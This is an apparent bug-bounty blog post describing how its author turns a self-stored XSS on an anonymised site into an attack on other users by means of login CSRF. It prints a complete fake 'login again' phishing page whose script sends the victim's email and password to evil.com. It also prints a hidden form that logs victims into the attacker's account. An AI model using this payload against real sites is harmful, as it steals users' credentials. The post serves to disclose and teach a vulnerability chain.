Open in app

Sign in

Write

Sign in

Self XSS To Evil XSS

Saad Ahmed
3 min readJun 20, 2019

Hi guy I hope you all are fine this POC is all about how I convert the Self XSS To Evil XSS so let assume the site PRIVATE.COM

The first step simply sign-up and login to the account & start playing with the change account details functionality after some time I find out that the first name field is vulnerable to xss but the problem is this is self stored xss so I need to convert this xss to exploit other users I check the 1st method through CSRF but there is a CSRF token in the account update functionality so this method fail & then I remember GEEK BOY POC.

So simple created the html + js code to steal email & pass of victim.

<!DOCTYPE html>
<html>
<head>
    <title>XSS</title>
</head>
<body>

    <center><div class="panel-body">
        <h3>Something Went Wrong Please Login Again</h3>

            <div class="login-group">
                <label for="email" class="control-label">Email</label>
                <input  id="Vemail" class="input span12" name="email" required="" type="email" value="" autofocus="">
            </div>

            <div class="login-group">
                <label for="password" class="control-label">Password</label>
                <input id="Vpass" class="input span12" name="password" required="" type="password" value="">
                <div class="alert alert-error error hide" id="error_missingPassword">Please enter your password</div>
            </div>

            <button class="action-button btn btn-primary login-button" buttontype="login" type="submit" onclick="myFunction()">Login</button>

    </div>


    <script>
        function myFunction() {
          var x = document.getElementById("Vemail").value;
          var y = document.getElementById("Vpass").value;
          var pwd = x + ":" + y;
          alert(pwd);
          window.location = "https://evil.com/" + pwd;
        }
    </script>



</body>
</html>

This is a simple html code with 2 input fields with 1 button asking for Email and Password & the JS code simply get the input field value & send it to attacker server and upload the code the web host.

Simply use I frame to load the code from web host.

This is how i look like.

Everything is good now all I need is to send the user this form.

<html>
  <body>
    <form action="https://attacker.com/login/submit" method="POST">
      <input type="hidden" name="email" value="email@gmail.com" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This is simply make victim to login in my account without knowing him & when he login in my account he see the msg Something Went Wrong with input fields & try to login when he try the JS code simply get the email & pass victim enter and send it to attacker server

I hope you like it :)

./Logout

JavaScript

--

--

Saad Ahmed

Written by Saad Ahmed

575 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams